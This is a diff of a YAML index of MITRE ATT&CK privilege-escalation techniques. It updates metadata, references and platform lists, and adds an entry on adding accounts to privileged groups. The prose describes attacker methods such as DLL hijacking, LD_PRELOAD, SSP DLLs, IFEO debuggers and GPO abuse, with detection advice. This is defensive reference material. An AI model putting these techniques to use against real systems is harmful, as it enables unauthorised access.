         modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16737,7 +17003,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -16763,6 +17029,10 @@ privilege-escalation:
         description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
           17, 2020.
         url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+      - source_name: Hexacorn DLL Hijacking
+        description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+          Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
       - source_name: Microsoft Security Advisory 2269637
         description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
           March 13, 2020.
@@ -16790,12 +17060,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1574.001
     atomic_tests: []
   T1574.014:
     technique:
-      modified: '2024-04-18T15:03:32.158Z'
+      modified: '2024-04-28T15:44:25.342Z'
       name: AppDomainManager
       description: "Adversaries may execute their own malicious payloads by hijacking
         how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16821,7 +17090,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Thomas B
-      - Ivy Bostock
+      - Ivy Drexel
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -16863,7 +17132,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1098.006:
     technique:
@@ -16941,11 +17209,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17025,7 +17292,77 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
+    atomic_tests: []
+  T1098.007:
+    technique:
+      modified: '2024-10-14T14:32:08.926Z'
+      name: Additional Local or Domain Groups
+      description: "An adversary may add additional local or domain groups to an adversary-controlled
+        account to maintain persistent access to a system or domain.\n\nOn Windows,
+        accounts may use the `net localgroup` and `net group` commands to add existing
+        users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+        Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+        the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+        added to the local administrators group on Windows devices to maintain elevated
+        privileges. They may also be added to the Remote Desktop Users group, which
+        allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+        to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+        Linux, accounts may be added to the sudoers group, allowing them to persistently
+        leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+        for elevated privileges. \n\nIn Windows environments, machine accounts may
+        also be added to domain groups. This allows the local SYSTEM account to gain
+        privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Modification'
+      type: attack-pattern
+      id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+      created: '2024-08-05T20:49:49.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1098/007
+        external_id: T1098.007
+      - source_name: Linux Usermod
+        description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+        url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+      - source_name: Microsoft Net Group
+        description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+          2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+      - source_name: Microsoft Net Localgroup
+        description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+          5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+      - source_name: Microsoft RDP Logons
+        description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+          Services. Retrieved August 5, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+      - source_name: RootDSE AD Detection 2022
+        description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+          Active Directory environments. Retrieved August 5, 2024.
+        url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.003:
     technique:
@@ -17048,7 +17385,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17096,8 +17433,6 @@ privilege-escalation:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1546.011:
@@ -17129,7 +17464,7 @@ privilege-escalation:
         description: Pierce, Sean. (2015, November). Defending Against Malicious Application
           Compatibility Shims. Retrieved June 22, 2017.
         source_name: Black Hat 2015 App Shim
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.094Z'
       name: 'Event Triggered Execution: Application Shimming'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by application shims. The Microsoft
@@ -17184,13 +17519,11 @@ privilege-escalation:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.011
     atomic_tests: []
   T1547.010:
     technique:
-      modified: '2024-04-12T02:49:39.980Z'
+      modified: '2024-09-12T15:26:17.886Z'
       name: 'Boot or Logon Autostart Execution: Port Monitors'
       description: "Adversaries may use port monitors to run an adversary supplied
         DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17251,9 +17584,9 @@ privilege-escalation:
           slides&#93;. Retrieved November 12, 2014.
         url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
       - source_name: AddMonitor
-        description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
-          2014.
-        url: http://msdn.microsoft.com/en-us/library/dd183341
+        description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -17262,7 +17595,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.010
     atomic_tests: []
   T1037.002:
@@ -17315,7 +17647,7 @@ privilege-escalation:
         Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
         version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
         and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:42:05.094Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
       x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -17336,12 +17668,11 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.002
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -17444,7 +17775,6 @@ privilege-escalation:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1611:
@@ -17544,12 +17874,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1611
     atomic_tests: []
   T1547.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:41:16.110Z'
       name: 'Boot or Logon Autostart Execution: Shortcut Modification'
       description: |-
         Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -17562,7 +17891,6 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - David French, Elastic
       - Bobby, Filar, Elastic
@@ -17575,7 +17903,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.2'
@@ -17605,7 +17932,8 @@ privilege-escalation:
         url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1547.009
     atomic_tests: []
   T1547.005:
@@ -17632,7 +17960,7 @@ privilege-escalation:
         description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
           Retrieved June 24, 2015.
         source_name: Microsoft Configure LSA
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T15:42:48.910Z'
       name: 'Boot or Logon Autostart Execution: Security Support Provider'
       description: |-
         Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -17658,13 +17986,11 @@ privilege-escalation:
       - 'Windows Registry: Windows Registry Key Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.005
     atomic_tests: []
   T1543.004:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:48.453Z'
       name: 'Create or Modify System Process: Launch Daemon'
       description: |-
         Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in <code>/System/Library/LaunchDaemons/</code> and <code>/Library/LaunchDaemons/</code>. Required Launch Daemons parameters include a <code>Label</code> to identify the task, <code>Program</code> to provide a path to the executable, and <code>RunAtLoad</code> to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -17741,12 +18067,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1543.004
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -17765,6 +18090,7 @@ privilege-escalation:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -17772,7 +18098,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -17792,34 +18117,36 @@ privilege-escalation:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -17855,6 +18182,10 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -17866,16 +18197,12 @@ privilege-escalation:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -17911,12 +18238,12 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -17924,14 +18251,13 @@ privilege-escalation:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -17946,6 +18272,7 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -17954,18 +18281,18 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -17997,9 +18324,6 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1547.003:
@@ -18071,7 +18395,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.003
     atomic_tests: []
   T1546.005:
@@ -18098,7 +18421,7 @@ privilege-escalation:
         url: https://bash.cyberciti.biz/guide/Trap_statement
         description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
           2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T16:43:02.273Z'
       name: 'Event Triggered Execution: Trap'
       description: |-
         Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>.
@@ -18124,13 +18447,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.005
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -18251,12 +18572,11 @@ privilege-escalation:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -18288,11 +18608,10 @@ privilege-escalation:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -18333,11 +18652,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -18393,12 +18711,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18455,7 +18772,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1547.004:
@@ -18525,7 +18841,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -18635,7 +18950,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -18689,7 +19003,7 @@ privilege-escalation:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18722,13 +19036,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18790,10 +19102,9 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -18851,7 +19162,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -18893,7 +19203,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -18952,8 +19262,6 @@ privilege-escalation:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
